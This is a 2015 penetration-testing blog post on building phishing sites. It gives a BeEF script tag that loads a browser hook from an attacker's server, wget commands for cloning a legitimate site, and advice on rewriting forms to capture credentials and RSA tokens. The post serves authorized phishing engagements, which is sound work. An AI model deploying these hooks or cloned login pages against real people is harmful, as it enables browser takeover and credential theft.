2015/04/02

Phishing 101: Cloning a Site

Many phishing exercises/engagements require both the sending of a malicious email as well as the presence of a malicious website/web server. This is definitely the case where the goal is to collect credentials or to exploit the user's web browser.

Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.

Browser Exploitation

First you could create a dummy site that just has some malicious code in it and the site does not really need to display anything to the user.  This is common with browser attacks.  One example of this is when using the BeEF (Browser Exploitation Framework) project.

The BeEF Project is a penetration tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their website as well as on their GitHub page.

If you take this approach, BeEF makes it very easy in that once you have BeEF running, you can create a web page that contains a line similar to:
<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>
You would want to replace the "127.0.0.1" with the IP of the Internet facing system that BeEF is running on.  Then send an email to the target instructing them to visit the web site that you inserted that line into and then you should have a successfully compromised web browser, once the target visits the malicious website.

Information/Credential Harvesting

Now for the second type of malicious website.  This type is a web site that looks as close to 100% valid as possible and will likely be used to capture credentials or other important information such as username, password, RSA token, etc...

To make such a site, you can:
  • use "wget" to clone an existing site, then edit it
  • make it entirely by hand
  • use a tool that is designed for site cloning to dedicated tool and then edit the results

If you wish to use "wget" to clone a site, the following options will come in handy.
  • perform full clone:
    • wget -m -p -k <URL>
      • -m = Mirroring : This option turns on recursion and time-stamping, sets infinite recursion depth.
      • -p = Page Requisites : This option causes wget to download all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.
  • only clone X levels deep:
    • wget -r -l 1 -p -k 
      • -r = Enable recursion
      • -l X = Limit recursion to X levels deep
      • -p = Page Requisites : This option downloads all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.

You may ask why you would not always want to just do a full clone.  Well, if you are just wanting to capture the values entered into a particular form, you will only need to clone that page and you would not need the rest of the site.

Now that you have cloned the site (or as much of it as you need to), you will need to edit the html and make any necessary changes to the forms that you need in order to capture the credentials.  This is also the time where you would make any other edits you desire. When editing forms, it is useful to have a secondary script handy that can be used as the "action" for the form. The code sample below is a simple php script that will log all GET and POST parameters passed to it.

When creating a web site by hand, you can get a bit of a head start by opening the page you want to clone and then "view source", select it all and copy paste it into a new html document. Then as before, you will need to make any necessary changes to the html that are needed.

There are a few tools available to help such as HTTrack. According to the website,
[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
Again as before, you will need to make any necessary changes to the html that are needed.

Finally, I would like to mention a script I wrote that can be used to help with cloning a site and automatically making any necessary edits to the contained forms.  The script can be found at https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py  I will be releasing a new blog post describing the details of this script in the next few days.

No comments:

Post a Comment